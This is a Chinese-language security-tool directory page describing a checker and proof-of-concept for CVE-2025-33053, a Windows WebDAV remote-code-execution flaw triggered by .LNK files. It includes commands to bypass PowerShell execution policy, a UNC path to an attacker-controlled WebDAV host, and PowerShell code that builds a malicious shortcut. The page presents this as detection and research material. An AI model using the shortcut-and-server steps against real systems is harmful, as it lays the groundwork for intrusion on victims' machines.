Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
漏洞分析漏洞利用Web安全渗透测试学习与教育
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

CVE-2025-33053 检查器与 PoC

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
121年前尚未审核
分享

CVE-2025-33053 漏洞检查器及概念验证(PoC)

Checker Proof 检查器验证截图

PoC Proof PoC 验证截图

一套完整的工具,用于检查并演示针对 CVE-2025-33053 的潜在利用——这是一项影响 Windows 系统的严重 WebDAV 远程代码执行(RCE)漏洞。


📌 关于 CVE-2025-33053

CVE-2025-33053 允许攻击者利用引用恶意远程 WebDAV 共享的 .LNK 快捷方式文件,在受影响系统上可能导致远程代码执行(RCE)。

漏洞条件:

  • 目标系统上必须安装并运行 WebClient 服务。
  • 目标操作系统在访问此类路径(即使通过 .LNK 文件)时,必须能够通过 WebDAV 解析 UNC 路径。

🔍 漏洞工作原理

  1. 构造的 .LNK 文件或直接访问 UNC 路径——指向类似以下的远程 UNC 路径:
  2. 当 .LNK 被访问或手动浏览 UNC 路径(例如通过文件资源管理器)时:
    • WebClient 服务通过 WebDAV 启动与远程 UNC 位置的通信。
    • 系统发送 PROPFIND 请求,从攻击者服务器查询元数据。
  3. 攻击者收到 PROPFIND 请求后,可以确认:
    • 目标系统通过 WebDAV 解析 UNC 路径。
    • 该系统可能对 CVE-2025-33053 存在漏洞。

✅ 实时漏洞检查器(CVE-2025-33053_checker.ps1)

功能说明:

检查项目的
🔍 WebClient 服务状态确认 WebDAV 支持是否已启用并正在运行。
🔍 通过 Test-Path 测试 UNC 路径处理测试系统是否能解析远程 WebDAV UNC 路径(CVE 利用的关键前提条件)。

运行方法:

  1. 以管理员身份打开 PowerShell。

  2. 如果脚本执行受限,请运行:

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. 运行检查器:.\CVE-2025-33053_checker.ps1

⚙️ 概念验证(PoC)服务器(CVE-2025-33053_PoC.py)

功能说明:

  • 在攻击者机器上搭建一个基于 Python 的类 WebDAV 服务器。
  • 当受害系统解析恶意 UNC 路径时,捕获传入的 PROPFIND 请求。
  • 在终端中显示该系统已发出请求——从而证明利用的可能性。
  • 注意:已在虚拟机中测试。

使用方法:

  1. 在攻击者(Kali)机器上:
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. 在目标机器上:
  • 直接在文件资源管理器中打开 UNC 路径:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • 手动在 Windows 中创建 .LNK 文件,或直接导航至:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • 使用 PowerShell 创建快捷方式的示例方法:
root@kitploit:~
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
  1. 如果目标存在漏洞,PoC 服务器将记录:
root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 为何此 PoC 合法且可靠:

✔️ 使用真实的 UNC 路径解析——非模拟。 ✔️ 捕获由操作系统触发的实际 PROPFIND 请求——这正是 CVE 利用所需的行为。 ✔️ 在未执行有效载荷或造成破坏的情况下,展示了真实的网络级漏洞证据。


🚧 重要说明

此 PoC 不会利用或危害目标系统——仅检测底层的脆弱行为。 仅用于受控环境或经明确授权的场景。 展示真实的系统行为——非模拟。 仅限教育用途。禁止在未经授权的系统上运行。


🏷️ 许可证

MIT 许可证——仅供教育、研究和防御目的免费使用。


🤝 贡献

欢迎提交拉取请求——改进检测、添加功能或提出修复建议。


⚠️ 免责声明

本仓库仅供教育和授权的安全研究使用。 严禁将本工具用于您不拥有或未经许可测试的系统。

下载工具